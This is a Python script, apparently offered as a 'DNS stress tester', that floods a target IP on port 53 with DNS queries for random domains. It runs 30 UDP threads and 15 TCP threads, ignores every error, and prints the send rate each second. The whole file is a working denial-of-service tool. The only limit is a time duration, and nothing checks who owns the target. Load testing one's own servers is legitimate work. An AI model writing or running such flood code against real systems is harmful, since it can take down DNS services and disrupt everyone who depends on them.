import socket import threading import random import time import string class DNSStressTester: def __init__(self, target_ip): self.target_ip = target_ip self.counter = 0 self.running = True def random_domain(self): return ''.join(random.choices(string.ascii_lowercase, k=random.randint(5,15))) + ".test" def dns_udp_flood(self): """UDP DNS flood""" while self.running: try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Simple DNS query for random domain domain = self.random_domain() query = b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00' for part in domain.split('.'): query += len(part).to_bytes(1, 'big') + part.encode() query += b'\x00\x00\x01\x00\x01' sock.sendto(query, (self.target_ip, 53)) self.counter += 1 sock.close() except: pass def dns_tcp_flood(self): """TCP DNS flood (more resource intensive)""" while self.running: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) sock.connect((self.target_ip, 53)) domain = self.random_domain() query = b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00' for part in domain.split('.'): query += len(part).to_bytes(1, 'big') + part.encode() query += b'\x00\x00\x01\x00\x01' # Add length prefix for TCP DNS tcp_query = len(query).to_bytes(2, 'big') + query sock.send(tcp_query) self.counter += 1 sock.close() except: pass def start_test(self, duration=60, udp_threads=20, tcp_threads=10): print(f"Starting DNS stress test against {self.target_ip}:53") print(f"Duration: {duration} seconds") # Start UDP flood threads for _ in range(udp_threads): t = threading.Thread(target=self.dns_udp_flood) t.daemon = True t.start() # Start TCP flood threads for _ in range(tcp_threads): t = threading.Thread(target=self.dns_tcp_flood) t.daemon = True t.start() # Monitor start_time = time.time() last_count = 0 while time.time() - start_time < duration: time.sleep(1) current_count = self.counter rate = current_count - last_count print(f"Requests sent: {current_count} | Rate: {rate} req/sec") last_count = current_count self.running = False time.sleep(1) print(f"\nTest completed: {self.counter} total DNS requests sent") # Usage if __name__ == "__main__": # Replace with your server IP tester = DNSStressTester("YOUR_SERVER_IP") tester.start_test(duration=30, udp_threads=30, tcp_threads=15)